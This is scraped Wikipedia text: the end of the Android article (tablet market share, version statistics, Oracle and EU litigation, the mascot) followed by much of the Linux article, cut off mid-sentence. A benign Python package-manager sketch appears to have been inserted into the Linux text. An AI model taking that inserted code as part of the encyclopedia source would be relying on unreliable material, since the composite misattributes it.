Due to the lack of Android tablet-specific applications in 2011, early Android tablets had to make do with existing smartphone applications that were ill-suited to larger screen sizes, whereas the dominance of Apple's iPad was reinforced by the large number of tablet-specific iOS applications.[430][431] Despite app support being in its infancy, a considerable number of Android tablets, like the Barnes & Noble Nook (alongside those using other operating systems, such as the HP TouchPad and BlackBerry PlayBook), were rushed out to market in an attempt to capitalize on the success of the iPad.[430] InfoWorld has suggested that some Android manufacturers initially treated their first tablets as a "Frankenphone business", a short-term, low-investment opportunity created by placing a smartphone-optimized Android OS (before Android 3.0 Honeycomb for tablets was available) on a device while neglecting the user interface. This approach, exemplified by the Dell Streak, failed to gain market traction with consumers and also damaged the early reputation of Android tablets.[432][433] Furthermore, several Android tablets such as the Motorola Xoom were priced the same or higher than the iPad, which hurt sales. An exception was the Amazon Kindle Fire, which relied upon lower pricing as well as access to Amazon's ecosystem of applications and content.[430][434] This began to change in 2012, with the release of the affordable Nexus 7 and a push by Google for developers to write better tablet applications.[435] According to International Data Corporation, shipments of Android-powered tablets surpassed iPads in Q3 2012.[436] As of the end of 2013, over 191.6 million Android tablets had been sold in the three years since 2011.[437][438] This made Android tablets the most-sold type of tablet in 2013, surpassing iPads in the second quarter of 2013.[439] According to StatCounter's web use statistics, as of 2020, Android tablets represent the majority of tablet devices used in Africa (70%) and South America (65%), while less than half elsewhere, e.g. Europe (44%), Asia (44%), North America (34%) and Oceania/Australia (18%). There are countries on all continents where Android tablets are the majority, for example, Mexico.[440] Android has a 71% market share versus 29% for Apple's iOS/iPadOS (on tablets alone Apple is slightly ahead, 52% to 48%, though Android is ahead in virtually all countries). As of May 2025, Android 14 is the most popular Android version on both smartphones and tablets. On smartphones it stands at 34%,[441] down from a peak of 37%, as Android 15, at 12%, has been eating into it and is about to become the third most popular version; it is followed by Android 13 and Android 12. Android is more used than iOS in virtually all countries, with a few exceptions such as the United States, where iOS has a 58% share. Android 14 is the most-used single version on all continents and in most countries, including India, the US and all European countries, with the exception of China (where Android 15 is well ahead of it[442]). Usage of Android 12 and newer, i.e. the supported versions, is at 73%; the remaining users no longer receive security updates. Including the recently unsupported Android 11, usage is at 83%. On tablets, Android 14 is again the most popular version overall (also in e.g. India, Russia, Australia, Europe and South America), at 27%.[443][444] Usage of Android 12 and newer, i.e. supported versions, is at 48% on Android tablets, rising to 64% when Android 11, which was supported until recently, is included. The usage share varies a lot by country.
Since April 2024, 85.0% of devices haveVulkangraphics support (77.6% support Vulkan 1.1 or higher, thereof 6.6% supporting Vulkan 1.3),[449]the successor to OpenGL. At the same time 100.0% of the devices have support forOpenGL ES 2.0or higher, 95.9% are onOpenGL ES 3.0or higher, and 88.6% are using the latest versionOpenGL ES 3.2. Paid Android applications in the past were simple topirate.[450]In a May 2012 interview withEurogamer, the developers ofFootball Managerstated that the ratio of pirated players vs legitimate players was 9:1 for their gameFootball Manager Handheld.[451]However, not every developer agreed that piracy rates were an issue; for example, in July 2012 the developers of the gameWind-up Knightsaid that piracy levels of their game were only 12%, and most of the piracy came from China, where people cannot purchase apps from Google Play.[452] In 2010, Google released a tool for validating authorized purchases for use within apps, but developers complained that this was insufficient and trivial tocrack. Google responded that the tool, especially its initial release, was intended as a sample framework for developers to modify and build upon depending on their needs, not as a finished piracy solution.[453]Android "Jelly Bean" introduced the ability for paid applications to be encrypted, so that they may work only on the device for which they were purchased.[454][455] The success of Android has made it a target forpatentandcopyrightlitigation between technology companies, both Android and Android phone manufacturers having been involved in numerous patent lawsuits and other legal challenges. On August 12, 2010,Oraclesued Google over claimed infringement of copyrights and patents related to theJavaprogramming language.[456]Oracle originally sought damages up to $6.1 billion,[457]but this valuation was rejected by a United States federal judge who asked Oracle to revise the estimate.[458]In response, Google submitted multiple lines of defense, counterclaiming that Android did not infringe on Oracle's patents or copyright, that Oracle's patents were invalid, and several other defenses. They said that Android's Java runtime environment is based onApache Harmony, aclean roomimplementation of the Java class libraries, and an independently developed virtual machine calledDalvik.[459]In May 2012, the jury in this case found that Google did not infringe on Oracle's patents, and the trial judge ruled that the structure of the Java APIs used by Google was not copyrightable.[460][461]The parties agreed to zero dollars instatutory damagesfor a small amount of copied code.[462]On May 9, 2014, theFederal Circuitpartially reversed the district court ruling, ruling in Oracle's favor on the copyrightability issue, andremandingthe issue offair useto the district court.[463][464] In December 2015, Google announced that the next major release of Android (Android Nougat) would switch toOpenJDK, which is the official open-source implementation of the Java platform, instead of using the now-discontinued Apache Harmony project as its runtime. 
Code reflecting this change was also posted to the AOSP source repository.[225]In its announcement, Google claimed this was part of an effort to create a "common code base" between Java on Android and other platforms.[226]Google later admitted in a court filing that this was part of an effort to address the disputes with Oracle, as its use of OpenJDK code is governed under theGNU General Public License(GPL) with alinking exception, and that "any damages claim associated with the new versions expressly licensed by Oracle under OpenJDK would require a separate analysis of damages from earlier releases".[225]In June 2016, a United States federal court ruled in favor of Google, stating that its use of the APIs was fair use.[465] In April 2021, the Supreme Court of the United States ruled that Google's use of the Java APIs was within the bounds of fair use, reversing the Federal Circuit Appeals Court ruling and remanding the case for further hearing. The majority opinion began with the assumption that the APIs may be copyrightable, and thus proceeded with a review of the factors that contributed to fair use.[466] In 2013,FairSearch, a lobbying organization supported byMicrosoft,Oracleand others, filed a complaint regarding Android with theEuropean Commission, alleging that its free-of-charge distribution model constituted anti-competitivepredatory pricing. TheFree Software Foundation Europe, whose donors include Google, disputed the Fairsearch allegations.[467]On April 20, 2016, the EU filed a formalantitrust complaintagainst Google based upon the FairSearch allegations, arguing that its leverage over Android vendors, including the mandatory bundling of the entire suite of proprietary Google software, hindering the ability for competing search providers to be integrated into Android, and barring vendors from producing devices running forks of Android, constituted anti-competitive practices.[468]In August 2016, Google was fined US$6.75 million by the RussianFederal Antimonopoly Service(FAS) under similar allegations byYandex.[469]The European Commission issued its decision on July 18, 2018, determining that Google had conducted three operations related to Android that were in violation of antitrust regulations: bundling Google's search and Chrome as part of Android, blocking phone manufacturers from using forked versions of Android, and establishing deals with phone manufacturers and network providers to exclusively bundle the Google search application on handsets (a practice Google ended by 2014). The EU fined Google for€4.3 billion(aboutUS$5 billion) and required the company to end this conduct within 90 days.[470]Google filed its appeal of the ruling in October 2018, though will not ask for any interim measures to delay the onset of conduct requirements.[471] On October 16, 2018, Google announced that it would change its distribution model for Google Mobile Services in the EU, since part of its revenues streams for Android which came through use of Google Search and Chrome were now prohibited by the EU's ruling. While the core Android system remains free, OEMs in Europe would be required to purchase a paid license to the core suite of Google applications, such as Gmail, Google Maps and the Google Play Store. Google Search will be licensed separately, with an option to include Google Chrome at no additional cost atop Search. European OEMs can bundle third-party alternatives on phones and devices sold to customers, if they so choose. 
OEMs will no longer be barred from selling any device running incompatible versions of Android in Europe.[472] In addition to lawsuits against Google directly, variousproxy warshave been waged against Android indirectly by targeting manufacturers of Android devices, with the effect of discouraging manufacturers from adopting the platform by increasing the costs of bringing an Android device to market.[473]BothAppleand Microsoft have sued several manufacturers for patent infringement, with Apple'slegal action against Samsungbeing a particularly high-profile case. In January 2012, Microsoft said they had signed patent license agreements with eleven Android device manufacturers, whose products account for "70 percent of all Android smartphones" sold in the US[474]and 55% of the worldwide revenue for Android devices.[475]These includeSamsungandHTC.[476]Samsung's patent settlement with Microsoft included an agreement to allocate more resources to developing and marketing phones running Microsoft's Windows Phone operating system.[473]Microsoft has alsotiedits own Android software to patent licenses, requiring the bundling ofMicrosoft Office MobileandSkypeapplications on Android devices to subsidize the licensing fees, while at the same time helping to promote its software lines.[477][478] Google has publicly expressed its frustration for the current patent landscape in the United States, accusing Apple, Oracle and Microsoft of trying to take down Android through patent litigation, rather than innovating and competing with better products and services.[479]In August 2011, Google purchasedMotorola Mobilityfor US$12.5 billion, which was viewed in part as a defensive measure to protect Android, since Motorola Mobility held more than 17,000 patents.[480][481]In December 2011, Google bought over a thousand patents fromIBM.[482] Turkey's competition authority investigations about the default search engine in Android, started in 2017, led to a US$17.4 million fine in September 2018 and a fine of 0.05 percent of Google's revenue per day in November 2019 when Google did not meet the requirements.[483]In December 2019, Google stopped issuing licenses for new Android phone models sold in Turkey.[483] Google has developed several variations of Android for specific use cases, including Android Wear, later renamedWear OS, for wearable devices such as wrist watches,[484][485]Android TVfor televisions,[486][487]Android Thingsfor smart orInternet of thingsdevices andAndroid Automotivefor cars.[488][489]Additionally, by providing infrastructure that combines dedicated hardware and dedicated applications running on regular Android, Google have opened up the platform for its use in particular usage scenarios, such as theAndroid Autoapp for cars,[490][491]andDaydream, a Virtual Reality platform.[492] The open and customizable nature of Android allowsdevice makersto use it on other electronics as well, including laptops,netbooks,[493][494]and desktop computers,[495]cameras,[496]headphones,[497]home automationsystems, game consoles,[498]media players,[499]satellites,[500]routers,[501]printers,[502]payment terminals,[503]automated teller machines,[504]inflight entertainment systems,[505]androbots.[506]Additionally, Android has been installed and run on a variety of less-technical objects, including calculators,[507]single-board computers,[508]feature phones,[509]electronic dictionaries,[510]alarm clocks,[511]refrigerators,[512]landlinetelephones,[513]coffee machines,[514]bicycles,[515]and mirrors.[498] Ouya, a video 
game console running Android, became one of the most successfulKickstartercampaigns,crowdfundingUS$8.5m for its development,[516][517]and was later followed by other Android-based consoles, such asNvidia'sShield Portable– an Android device in avideo game controllerform factor.[518] In 2011, Google demonstrated "Android@Home", a home automation technology which uses Android to control a range of household devices including light switches, power sockets and thermostats.[519]Prototype light bulbs were announced that could be controlled from an Android phone or tablet, but Android head Andy Rubin was cautious to note that "turning a lightbulb on and off is nothing new", pointing to numerous failed home automation services. Google, he said, was thinking more ambitiously and the intention was to use their position as acloudservices provider to bring Google products into customers' homes.[520][521] Parrotunveiled an Android-basedcar stereosystem known as Asteroid in 2011,[522]followed by a successor, the touchscreen-based Asteroid Smart, in 2012.[523]In 2013,Clarionreleased its own Android-based car stereo, the AX1.[524]In January 2014, at theConsumer Electronics Show(CES), Google announced the formation of theOpen Automotive Alliance, a group including several major automobile makers (Audi,General Motors,Hyundai, andHonda) andNvidia, which aims to produce Android-basedin-car entertainmentsystems for automobiles, "[bringing] the best of Android into the automobile in a safe and seamless way."[525] Android comes preinstalled on a few laptops (a similar functionality of running Android applications is also available in Google'sChromeOS) and can also be installed onpersonal computersby end users.[526][527]On those platforms Android provides additional functionality for physicalkeyboards[528]andmice, together with the "Alt-Tab" key combination for switching applications quickly with a keyboard. In December 2014, one reviewer commented that Android's notification system is "vastly more complete and robust than in most environments" and that Android is "absolutely usable" as one's primary desktop operating system.[529] In October 2015,The Wall Street Journalreported that Android will serve as Google's future main laptop operating system, with the plan to fold ChromeOS into it by 2017.[530][531]Google's Sundar Pichai, who led the development of Android, explained that "mobile as a computing paradigm is eventually going to blend with what we think of as desktop today."[530]Also, back in 2009, Google co-founder Sergey Brin himself said that ChromeOS and Android would "likely converge over time."[532]Lockheimer, who replaced Pichai as head of Android and ChromeOS, responded to this claim with an official Google blog post stating that "While we've been working on ways to bring together the best of both operating systems, there's no plan to phase out ChromeOS [which has] guaranteed auto-updates for five years".[533]That is unlike Android where support is shorter with "EOLdates [being..] at least 3 years [into the future] for Android tablets for education".[534] At Google I/O in May 2016, Google announcedDaydream, avirtual realityplatform that relied on a smartphone and provided VR capabilities through avirtual reality headsetand controller designed by Google itself.[492]However, this did not catch on and was discontinued in 2019.[535] The mascot of Android is a greenandroid robot, as related to the software's name. 
Although it had no official name for a long time, the Android team at Google reportedly calls it "Bugdroid".[536] In 2024, a Google blog post revealed its official name, "The Bot".[537][538] It was designed by then-Google graphic designer Irina Blok on November 5, 2007, when Android was announced. Contrary to reports that she was tasked with a project to create an icon,[539] Blok confirmed in an interview that she independently developed it and made it open source. The robot design was initially not presented to Google, but it quickly became commonplace in the Android development team, with numerous variations created by the developers there, who liked the figure because it was free under a Creative Commons license.[540][541] Its popularity amongst the development team eventually led to Google adopting it as an official icon as part of the Android logo when it launched to consumers in 2008.
https://en.wikipedia.org/wiki/Android_(operating_system)
Linux(/ˈlɪnʊks/,LIN-uuks)[15]is a family ofopen sourceUnix-likeoperating systemsbased on theLinux kernel,[16]anoperating system kernelfirst released on September 17, 1991, byLinus Torvalds.[17][18][19]Linux is typicallypackagedas aLinux distribution(distro), which includes the kernel and supportingsystem softwareandlibraries—most of which are provided by third parties—to create a complete operating system, designed as a clone ofUnixand released under thecopyleftGPLlicense.[20] Thousands of Linux distributionsexist, many based directly or indirectly on other distributions;[21][22]popular Linux distributions[23][24][25]includeDebian,Fedora Linux,Linux Mint,Arch Linux, andUbuntu, while commercial distributions includeRed Hat Enterprise Linux,SUSE Linux Enterprise, andChromeOS. Linux distributions are frequently used in server platforms.[26][27]Many Linux distributions use the word "Linux" in their name, but theFree Software Foundationuses and recommends the name "GNU/Linux" to emphasize the use and importance ofGNUsoftware in many distributions, causing somecontroversy.[28][29]Other than the Linux kernel, key components that make up a distribution may include adisplay server (windowing system), apackage manager, a bootloader and aUnix shell. Linux is one of the most prominent examples of free and open-sourcesoftwarecollaboration. While originally developed forx86basedpersonal computers, it has since beenportedto moreplatformsthan any other operating system,[30]and is used on a wide variety of devices including PCs,workstations,mainframesandembedded systems. Linux is the predominant operating system forserversand is also used on all of theworld's 500 fastest supercomputers.[g]When combined withAndroid, which is Linux-based and designed forsmartphones, they have thelargest installed baseof allgeneral-purpose operating systems. The Linux kernel was designed byLinus Torvalds, following the lack of a workingkernelforGNU, aUnix-compatible operating system made entirely offree softwarethat had been undergoing development since 1983 byRichard Stallman. A working Unix system calledMinixwas later released but its license was not entirely free at the time[31]and it was made for an educative purpose. The first entirely free Unix for personal computers,386BSD, did not appear until 1992, by which time Torvalds had already built and publicly released the first version of theLinux kernelon theInternet.[32]Like GNU and 386BSD, Linux did not have any Unix code, being a fresh reimplementation, and therefore avoided thethen legal issues.[33]Linux distributions became popular in the 1990s and effectively made Unix technologies accessible to home users on personal computers whereas previously it had been confined to sophisticatedworkstations.[34] Desktop Linux distributions include awindowing systemsuch asX11orWaylandand adesktop environmentsuch asGNOME,KDE PlasmaorXfce. Distributions intended forserversmay not have agraphical user interfaceat all or include asolution stacksuch asLAMP. Thesource codeof Linux may be used, modified, and distributed commercially or non-commercially by anyone under the terms of its respective licenses, such as theGNU General Public License(GPL). 
The license means creating novel distributions is permitted by anyone[35]and is easier than it would be for an operating system such asMacOSorMicrosoft Windows.[36][37][38]The Linux kernel, for example, is licensed under the GPLv2, with an exception forsystem callsthat allows code that calls the kernel via system calls not to be licensed under the GPL.[39][40][35] Because of the dominance of Linux-basedAndroidonsmartphones, Linux, including Android, has thelargest installed baseof allgeneral-purpose operating systemsas of May 2022[update].[41][42][43]Linux is, as of March 2024[update], used by around 4 percent ofdesktop computers.[44]TheChromebook, which runs the Linux kernel-basedChromeOS,[45][46]dominates the USK–12education market and represents nearly 20 percent of sub-$300notebooksales in the US.[47]Linux is the leading operating system on servers (over 96.4% of the top one million web servers' operating systems are Linux),[48]leads otherbig ironsystems such asmainframe computers,[clarification needed][49]and is used on all of theworld's 500 fastest supercomputers[h](as of November 2017[update], having gradually displaced all competitors).[50][51] Linux also runs onembedded systems, i.e., devices whose operating system is typically built into thefirmwareand is highly tailored to the system. This includesrouters,automationcontrols,smart home devices,video game consoles,televisions(Samsung and LGsmart TVs),[52][53][54]automobiles(Tesla, Audi, Mercedes-Benz, Hyundai, and Toyota),[55]andspacecraft(Falcon 9rocket,Dragoncrew capsule, and theIngenuityMars helicopter).[56][57] TheUnixoperating system was conceived of and implemented in 1969, atAT&T'sBell Labsin the United States, byKen Thompson,Dennis Ritchie,Douglas McIlroy, andJoe Ossanna.[58]First released in 1971, Unix was written entirely inassembly language, as was common practice at the time. In 1973, in a key pioneering approach, it was rewritten in theCprogramming language by Dennis Ritchie (except for some hardware and I/O routines). The availability of ahigh-level languageimplementation of Unix made itsportingto different computer platforms easier.[59] As a 1956antitrust caseforbade AT&T from entering the computer business,[60]AT&T provided the operating system'ssource codeto anyone who asked. As a result, Unix use grew quickly and it became widely adopted byacademic institutionsand businesses. In 1984,AT&T divested itselfof itsregional operating companies, and was released from its obligation not to enter the computer business; freed of that obligation, Bell Labs began selling Unix as aproprietaryproduct, where users were not legally allowed to modify it.[61][62] Onyx Systemsbegan selling early microcomputer-based Unix workstations in 1980. Later,Sun Microsystems, founded as a spin-off of a student project atStanford University, also began selling Unix-based desktop workstations in 1982. While Sun workstations did not use commodity PC hardware, for which Linux was later originally developed, it represented the first successful commercial attempt at distributing a primarily single-user microcomputer that ran a Unix operating system.[63][64] With Unix increasingly "locked in" as a proprietary product, theGNU Project, started in 1983 byRichard Stallman, had the goal of creating a "complete Unix-compatible software system" composed entirely offree software. Work began in 1984.[65]Later, in 1985, Stallman started theFree Software Foundationand wrote theGNU General Public License(GNU GPL) in 1989. 
By the early 1990s, many of the programs required in an operating system (such as libraries,compilers,text editors, acommand-line shell, and awindowing system) were completed, although low-level elements such asdevice drivers,daemons, and thekernel, calledGNU Hurd, were stalled and incomplete.[66] Minixwas created byAndrew S. Tanenbaum, acomputer scienceprofessor, and released in 1987 as a minimal Unix-like operating system targeted at students and others who wanted to learn operating system principles. Although thecomplete source code of Minix was freely available, the licensing terms prevented it from beingfree softwareuntil the licensing changed in April 2000.[67] While attending theUniversity of Helsinkiin the fall of 1990, Torvalds enrolled in a Unix course.[68]The course used aMicroVAXminicomputer runningUltrix, and one of the required texts wasOperating Systems: Design and ImplementationbyAndrew S. Tanenbaum. This textbook included a copy of Tanenbaum'sMinixoperating system. It was with this course that Torvalds first became exposed to Unix. In 1991, he became curious about operating systems.[69]Frustrated by the licensing of Minix, which at the time limited it to educational use only,[67]he began to work on his operating system kernel, which eventually became the Linux kernel. On July 3, 1991, to implement Unixsystem calls, Linus Torvalds attempted unsuccessfully to obtain a digital copy of thePOSIXstandardsdocumentationwith a request to thecomp.os.minixnewsgroup.[70]After not finding the POSIX documentation, Torvalds initially resorted to determining system calls fromSunOSdocumentation owned by the university for use in operating itsSun Microsystemsserver. He also learned some system calls from Tanenbaum's Minix text. Torvalds began the development of the Linux kernel on Minix and applications written for Minix were also used on Linux. Later, Linux matured and further Linux kernel development took place on Linux systems.[71]GNU applications also replaced all Minix components, because it was advantageous to use the freely available code from the GNU Project with the fledgling operating system; code licensed under the GNU GPL can be reused in other computer programs as long as they also are released under the same or a compatible license. Torvalds initiated a switch from his original license, which prohibited commercial redistribution, to the GNU GPL.[72]Developers worked to integrate GNU components with the Linux kernel, creating a fully functional and free operating system.[73] Although not released until 1992, due tolegal complications, the development of386BSD, from whichNetBSD,OpenBSDandFreeBSDdescended, predated that of Linux. Linus Torvalds has stated that if theGNU kernelor 386BSD had been available in 1991, he probably would not have created Linux.[74][31] Linus Torvalds had wanted to call his invention "Freax", aportmanteauof "free", "freak", and "x" (as an allusion to Unix). During the start of his work on the system, some of the project'smakefilesincluded the name "Freax" for about half a year. Torvalds considered the name "Linux" but dismissed it as too egotistical.[75] To facilitate development, the files were uploaded to theFTP serverofFUNETin September 1991. 
Ari Lemmke, Torvalds' coworker at theHelsinki University of Technology(HUT) who was one of the volunteer administrators for the FTP server at the time, did not think that "Freax" was a good name, so he named the project "Linux" on the server without consulting Torvalds.[75]Later, however, Torvalds consented to "Linux". According to anewsgrouppost by Torvalds,[15]the word "Linux" should be pronounced (/ˈlɪnʊks/ⓘLIN-uuks) with a short 'i' as in 'print' and 'u' as in 'put'. To further demonstrate how the word "Linux" should be pronounced, he included an audio guide with the kernel source code.[76]However, in this recording, he pronounces Linux as/ˈlinʊks/(LEEN-uuks) with a short butclose front unrounded vowel, instead of anear-close near-front unrounded vowelas in his newsgroup post. The adoption of Linux in production environments, rather than being used only by hobbyists, started to take off first in the mid-1990s in the supercomputing community, where organizations such asNASAstarted to replace their increasingly expensive machines withclustersof inexpensive commodity computers running Linux. Commercial use began whenDellandIBM, followed byHewlett-Packard, started offering Linux support to escapeMicrosoft's monopoly in the desktop operating system market.[77] Today, Linux systems are used throughout computing, fromembedded systemsto virtually allsupercomputers,[51][78]and have secured a place in server installations such as the popularLAMPapplication stack. The use of Linux distributions in home and enterprise desktops has been growing.[79][80][81][82][83][84][85] Linux distributions have also become popular in thenetbookmarket, with many devices shipping with customized Linux distributions installed, and Google releasing their ownChromeOSdesigned for netbooks. Linux's greatest success in the consumer market is perhaps the mobile device market, with Android being the dominant operating system onsmartphonesand very popular ontabletsand, more recently, onwearables, and vehicles.Linux gamingis also on the rise withValveshowing its support for Linux and rolling outSteamOS, its own gaming-oriented Linux distribution, which was later implemented in theirSteam Deckplatform. Linux distributions have also gained popularity with various local and national governments, such as the federal government ofBrazil.[86] Linus Torvalds is the lead maintainer for the Linux kernel and guides its development, whileGreg Kroah-Hartmanis the lead maintainer for the stable branch.[87]Zoë Kooymanis the executive director of the Free Software Foundation,[88]which in turn supports the GNU components.[89]Finally, individuals and corporations develop third-party non-GNU components. These third-party components comprise a vast body of work and may include both kernel modules and user applications and libraries. Linux vendors and communities combine and distribute the kernel, GNU components, and non-GNU components, with additionalpackage managementsoftware in the form of Linux distributions. Many developers ofopen-sourcesoftware agree that the Linux kernel was not designed but ratherevolvedthroughnatural selection. Torvalds considers that although the design of Unix served as a scaffolding, "Linux grew with a lot of mutations – and because the mutations were less than random, they were faster and more directed thanalpha-particles in DNA."[90]Eric S. 
Raymondconsiders Linux's revolutionary aspects to be social, not technical: before Linux, complex software was designed carefully by small groups, but "Linux evolved in a completely different way. From nearly the beginning, it was rather casually hacked on by huge numbers of volunteers coordinating only through the Internet. Quality was maintained not by rigid standards or autocracy but by the naively simple strategy of releasing every week and getting feedback from hundreds of users within days, creating a sort of rapid Darwinian selection on the mutations introduced by developers."[91]Bryan Cantrill, an engineer of a competing OS, agrees that "Linux wasn't designed, it evolved", but considers this to be a limitation, proposing that some features, especially those related to security,[92]cannot be evolved into, "this is not a biological system at the end of the day, it's a software system."[93] A Linux-based system is a modular Unix-like operating system, deriving much of its basic design from principles established in Unix during the 1970s and 1980s. Such a system uses amonolithic kernel, the Linux kernel, which handles process control, networking, access to theperipherals, andfile systems.Device driversare either integrated directly with the kernel or added as modules that are loaded while the system is running.[94] The GNUuserlandis a key part of most systems based on the Linux kernel, with Android being the notable exception. TheGNU C library, an implementation of theC standard library, works as a wrapper for the system calls of the Linux kernel necessary to the kernel-userspace interface, thetoolchainis a broad collection of programming tools vital to Linux development (including thecompilersused to build the Linux kernel itself), and thecoreutilsimplement many basicUnix tools. The GNU Project also developsBash, a popularCLIshell. Thegraphical user interface(or GUI) used by most Linux systems is built on top of an implementation of theX Window System.[95]More recently, some of the Linux community has sought to move to usingWaylandas the display server protocol, replacing X11.[96][97] Many other open-source software projects contribute to Linux systems. Installed components of a Linux system include the following:[95][99] Theuser interface, also known as theshell, is either a command-line interface (CLI), a graphical user interface (GUI), or controls attached to the associated hardware, which is common for embedded systems. For desktop systems, the default user interface is usually graphical, although the CLI is commonly available throughterminal emulatorwindows or on a separatevirtual console. CLI shells are text-based user interfaces, which use text for both input and output. The dominant shell used in Linux is theBourne-Again Shell(bash), originally developed for the GNU Project;other shellssuch asZshare also used.[100][101]Most low-level Linux components, including various parts of theuserland, use the CLI exclusively. The CLI is particularly suited for automation of repetitive or delayed tasks and provides very simpleinter-process communication. On desktop systems, the most popular user interfaces are theGUI shells, packaged together with extensivedesktop environments, such asKDE Plasma,GNOME,MATE,Cinnamon,LXDE,Pantheon, andXfce, though a variety of additional user interfaces exist. Most popular user interfaces are based on the X Window System, often simply called "X" or "X11". 
It provides network transparency and permits a graphical application running on one system to be displayed on another, where a user may interact with the application; however, certain extensions of the X Window System are not capable of working over the network.[102] Several X display servers exist, with the reference implementation, X.Org Server, being the most popular. Several types of window managers exist for X11, including tiling, dynamic, stacking, and compositing. Window managers provide means to control the placement and appearance of individual application windows, and interact with the X Window System. Simpler X window managers such as dwm, ratpoison, or i3wm provide minimalist functionality, while more elaborate window managers such as FVWM, Enlightenment, or Window Maker provide more features such as a built-in taskbar and themes, but are still lightweight when compared to desktop environments. Desktop environments include window managers as part of their standard installations, such as Mutter (GNOME), KWin (KDE), or Xfwm (Xfce), although users may choose to use a different window manager if preferred. Wayland is a display server protocol intended as a replacement for the X11 protocol; as of 2022, it has received relatively wide adoption.[103] Unlike X11, Wayland does not need an external window manager or compositing manager; a Wayland compositor therefore takes on the roles of display server, window manager, and compositing manager. Weston is the reference implementation of Wayland, while GNOME's Mutter and KDE's KWin are being ported to Wayland as standalone display servers. Enlightenment has been successfully ported since version 19.[104] Additionally, many window managers have been made for Wayland, such as Sway or Hyprland, as well as other graphical utilities such as Waybar or Rofi. Linux currently has two modern kernel-userspace APIs for handling video input devices: the V4L2 API for video streams and radio, and the DVB API for digital TV reception.[105] Due to the complexity and diversity of devices, and the large number of formats and standards handled by those APIs, this infrastructure needs to evolve to better fit other devices. A good userspace device library is also key to enabling userspace applications to work with all the formats supported by those devices.[106][107] The primary difference between Linux and many other popular contemporary operating systems is that the Linux kernel and other components are free and open-source software. Linux is not the only such operating system, although it is by far the most widely used.[108] Some free and open-source software licenses are based on the principle of copyleft, a kind of reciprocity: any work derived from a copyleft piece of software must also be copyleft itself. The most common free software license, the GNU General Public License (GPL), is a form of copyleft and is used for the Linux kernel and many of the components from the GNU Project.[109] Linux-based distributions are intended by developers for interoperability with other operating systems and established computing standards.
Linux systems adhere to POSIX,[110]Single UNIX Specification(SUS),[111]Linux Standard Base(LSB),ISO, andANSIstandards where possible, although to date only one Linux distribution has been POSIX.1 certified, Linux-FT.[112][113]The Open Grouphas tested and certified at least two Linux distributions as qualifying for the Unix trademark,EulerOSandInspur K-UX.[114] Free software projects, although developed throughcollaboration, are often produced independently of each other. The fact that the software licenses explicitly permit redistribution, however, provides a basis for larger-scale projects that collect the software produced by stand-alone projects and make it available all at once in the form of a Linux distribution. Many Linux distributions manage a remote collection of system software and application software packages available for download and installation through a network connection. This allows users to adapt the operating system to their specific needs. Distributions are maintained by individuals, loose-knit teams, volunteer organizations, and commercial entities. A distribution is responsible for the default configuration of the installed Linux kernel, general system security, and more generally integration of the different software packages into a coherent whole. Distributions typically use a package manager such asapt,yum,zypper,pacmanorportageto install, remove, and update all of a system's software from one central location.[115] A distribution is largely driven by its developer and user communities. Some vendors develop and fund their distributions on a volunteer basis,Debianbeing a well-known example. Others maintain a community version of their commercial distributions, asRed Hatdoes withFedora, andSUSEdoes withopenSUSE.[116][117] In many cities and regions, local associations known asLinux User Groups(LUGs) seek to promote their preferred distribution and by extension free software. They hold meetings and provide free demonstrations, training, technical support, and operating system installation to new users. Many Internet communities also provide support to Linux users and developers. Most distributions and free software / open-source projects haveIRCchatrooms ornewsgroups.Online forumsare another means of support, with notable examples beingUnix & Linux Stack Exchange,[118][119]LinuxQuestions.organd the various distribution-specific support and community forums, such as ones forUbuntu, Fedora,Arch Linux,Gentoo, etc. Linux distributions hostmailing lists; commonly there will be a specific topic such as usage or development for a given list. There are several technology websites with a Linux focus. Print magazines on Linux often bundlecover disksthat carry software or even complete Linux distributions.[120][121] Although Linux distributions are generally available without charge, several large corporations sell, support, and contribute to the development of the components of the system and free software. An analysis of the Linux kernel in 2017 showed that well over 85% of the code was developed by programmers who are being paid for their work, leaving about 8.2% to unpaid developers and 4.1% unclassified.[122]Some of the major corporations that provide contributions includeIntel,Samsung,Google,AMD,Oracle, andFacebook.[122]Several corporations, notably Red Hat,Canonical, andSUSEhave built a significant business around Linux distributions. 
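To make the package-management workflow described above concrete, the sketch below maps a single install request onto whichever of the package managers named earlier (apt, yum, zypper, pacman, or portage's emerge) happens to be present. It is a minimal, hedged illustration rather than a real tool: the command spellings are the commonly documented ones, "htop" is just an example package name, and a production utility would need error handling and distribution-specific options.

```python
# Minimal sketch (not a real tool): dispatch one "install" request to
# whichever supported package manager is present on the system.
import shutil
import subprocess

INSTALL_COMMANDS = {
    "apt":    ["apt", "install", "-y"],
    "yum":    ["yum", "install", "-y"],
    "zypper": ["zypper", "--non-interactive", "install"],
    "pacman": ["pacman", "-S", "--noconfirm"],
    "emerge": ["emerge"],  # Gentoo's portage front end
}

def install(package: str) -> None:
    """Install `package` with the first package manager found on PATH."""
    for tool, cmd in INSTALL_COMMANDS.items():
        if shutil.which(tool):
            subprocess.run(["sudo", *cmd, package], check=True)
            return
    raise RuntimeError("no supported package manager found")

install("htop")  # example package name
```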
Thefree software licenses, on which the various software packages of a distribution built on the Linux kernel are based, explicitly accommodate and encourage commercialization; the relationship between a Linux distribution as a whole and individual vendors may be seen assymbiotic. One commonbusiness modelof commercial suppliers is charging for support, especially for business users. A number of companies also offer a specialized business version of their distribution, which adds proprietary support packages and tools to administer higher numbers of installations or to simplify administrative tasks.[123] Another business model is to give away the software to sell hardware. This used to be the norm in the computer industry, with operating systems such asCP/M,Apple DOS, and versions of theclassic Mac OSbefore 7.6 freely copyable (but not modifiable). As computer hardware standardized throughout the 1980s, it became more difficult for hardware manufacturers to profit from this tactic, as the OS would run on any manufacturer's computer that shared the same architecture.[124][125] Mostprogramming languagessupport Linux either directly or through third-party community basedports.[126]The original development tools used for building both Linux applications and operating system programs are found within theGNU toolchain, which includes theGNU Compiler Collection(GCC) and theGNU Build System. Amongst others, GCC provides compilers forAda,C,C++,GoandFortran. Many programming languages have a cross-platform reference implementation that supports Linux, for examplePHP,Perl,Ruby,Python,Java,Go,RustandHaskell. First released in 2003, theLLVMproject provides an alternative cross-platform open-source compiler for many languages.Proprietarycompilers for Linux include theIntel C++ Compiler,Sun Studio, andIBM XL C/C++ Compiler.BASICis available inproceduralform fromQB64,PureBasic,Yabasic,GLBasic,Basic4GL,XBasic,wxBasic,SdlBasic, andBasic-256, as well asobject orientedthroughGambas,FreeBASIC, B4X,Basic for Qt, Phoenix Object Basic,NS Basic, ProvideX,Chipmunk Basic,RapidQandXojo.Pascalis implemented throughGNU Pascal,Free Pascal, 